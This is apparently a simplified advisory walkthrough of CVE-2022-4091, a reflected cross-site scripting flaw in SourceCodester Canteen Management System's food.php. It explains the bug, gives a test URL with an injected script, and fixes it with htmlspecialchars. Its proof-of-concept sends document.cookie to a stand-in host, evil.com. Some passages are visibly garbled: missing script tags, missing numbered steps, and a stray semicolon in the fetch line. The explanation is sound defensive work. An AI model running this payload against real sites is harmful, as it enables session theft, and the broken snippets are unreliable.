CVE-2022-4091 is a cross-site scripting (XSS) vulnerability discovered in the SourceCodester Canteen Management System. This flaw is due to insufficient input sanitization in the query function inside the file food.php. It enables remote attackers to inject and execute malicious JavaScript on unsuspecting users’ browsers by manipulating the product_name parameter. The vulnerability was first published by VulDB - VDB-214359.
This walkthrough is crafted in simple American English and gives you a clear idea of what the issue is, how it can be exploited, and what you can do about it—even if you’re not a pro.
What Is XSS and Why Does It Matter?
Cross-site scripting (XSS) is when an attacker finds a way to make your website run their malicious code (like JavaScript). This can do things like steal cookies, impersonate users, or redirect them to bad sites. For web apps that manage sensitive or personal information, like a Canteen Management System, XSS can be a serious issue.
Where’s the Problem?
The issue lies in the food.php file of the SourceCodester Canteen Management System. Specifically, the query function processes the product_name parameter from user input. If this input isn’t properly filtered or sanitized, attackers can inject code.
Here’s an exclusive, easy-to-understand snippet inspired by the actual flaw in food.php
<?php
// food.php
$product_name = $_GET['product_name']; // gets product_name from URL
$query = "SELECT * FROM food WHERE name = '$product_name'";
// ... do DB query, then output relevant data
echo "You are searching for: " . $product_name; // BAD: no escaping!
?>
What’s wrong?
The code takes whatever is sent as product_name in the URL and prints it directly on the page without checking or cleaning it up first. If someone puts JavaScript code in there, it will run in users’ browsers.
`
http://example.com/food.php?product_name=alert('XSS')
`
You are searching for: alert('XSS')
`
3. The browser sees the <script> tag and runs the code inside—triggering a popup (in this simple test), or something much worse, like cookie theft.
Open this link (replace “example.com” with your target Canteen Management System install)
http://example.com/food.php?product_name=%3Cscript%3Ealert('CVE-2022-4091%20XSS')%3C%2Fscript%3E
If you get a popup showing “CVE-2022-4091 XSS”, you are vulnerable.
Here’s a proof-of-concept (PoC) payload
<script>
fetch('https://evil.com/?cookie='; + document.cookie);
</script>
If input like above gets echoed back into the page unsanitized, the attacker can steal session cookies.
How Can You Fix It?
The quick and best fix: Sanitize user input and encode it on output.
Replace direct output like this
echo "You are searching for: " . $product_name;
With this safer code
echo "You are searching for: " . htmlspecialchars($product_name, ENT_QUOTES, 'UTF-8');
This will turn <script>alert('XSS')</script> into harmless text.
References
- Original VulDB entry - VDB-214359
- XSS (Cross Site Scripting) Wiki
- SourceCodester official project page (for patches/updates)
Final Thoughts
CVE-2022-4091 highlights why input validation matters—even in small or internal tools like the Canteen Management System. If you use this software, patch your code as shown above. If you’re a user, be aware of suspicious links or popups, and let your admin know about this vulnerability.
Take XSS issues seriously, fix them fast, and always sanitize every piece of user input!
*This article is exclusive and simplified for readers wanting a clear, direct explanation and guidance on CVE-2022-4091 in SourceCodester’s Canteen Management System.*
Timeline
Published on: 11/25/2022 08:15:00 UTC
Last modified on: 11/30/2022 21:19:00 UTC